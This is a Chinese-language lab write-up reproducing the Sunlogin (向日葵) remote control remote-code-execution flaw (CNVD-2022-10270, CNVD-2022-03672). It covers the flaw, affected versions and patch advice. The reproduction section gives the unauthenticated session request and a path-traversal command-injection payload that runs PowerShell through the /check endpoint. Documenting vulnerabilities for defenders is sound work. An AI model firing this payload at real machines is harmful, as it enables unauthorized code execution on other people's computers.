向日葵远程控制软件远程代码执行漏洞(CNVD-2022-10270, CNVD-2022-03672)

向日葵远程控制软件远程代码执行漏洞(CNVD-2022-10270, CNVD-2022-03672)

    • 一、漏洞原理
    • 二、漏洞风险等级
    • 三、漏洞影响范围
    • 四、实验环境
      • 4.1靶机:
    • 五、漏洞复现(手工)
    • 六、防范措施


一、漏洞原理

向日葵是一款免费的,集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。

向日葵远程控制软件存在未授权访问漏洞,启动服务端软件后,会开放未授权访问端口,攻击者可通过未授权访问无需密码直接获取session,并借此远程执行任意代码。

二、漏洞风险等级

【高危】

三、漏洞影响范围

向日葵个人版(Windows) <= 11.0.0.33
向日葵简约版 <= V1.0.1.43315(2021.12)

四、实验环境

4.1靶机:

向日葵个人版(Windows) V 10.3.0.27

五、漏洞复现(手工)

5.1.1、探测开放端口,并验证可获取向日葵session的端口向日葵远程控制软件远程代码执行漏洞(CNVD-2022-10270, CNVD-2022-03672)_第1张图片
浏览器访问(在接口/cgi-bin/rpc的Handler处理函数中可以进行未授权认证):ip+端口号+cgi-bin/rpc?action=verify-haras(获取session值CID)一个一个端口尝试
向日葵远程控制软件远程代码执行漏洞(CNVD-2022-10270, CNVD-2022-03672)_第2张图片

5.1.2、构造payload(漏洞发生在接口/check处,当参数cmd的值以ping或者nslookup开头时可以构造命令实现远程命令执行利用),并在请求包中加入获取的cookie

/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami

向日葵远程控制软件远程代码执行漏洞(CNVD-2022-10270, CNVD-2022-03672)_第3张图片

六、防范措施

官方已发布漏洞补丁及修复版本,请及时升级至安全版本。

参考链接:
https://www.cnblogs.com/peace-and-romance/p/15905365.html
https://www.cnblogs.com/zUotTe0/p/15913108.html

你可能感兴趣的:(漏洞复现,安全,web安全)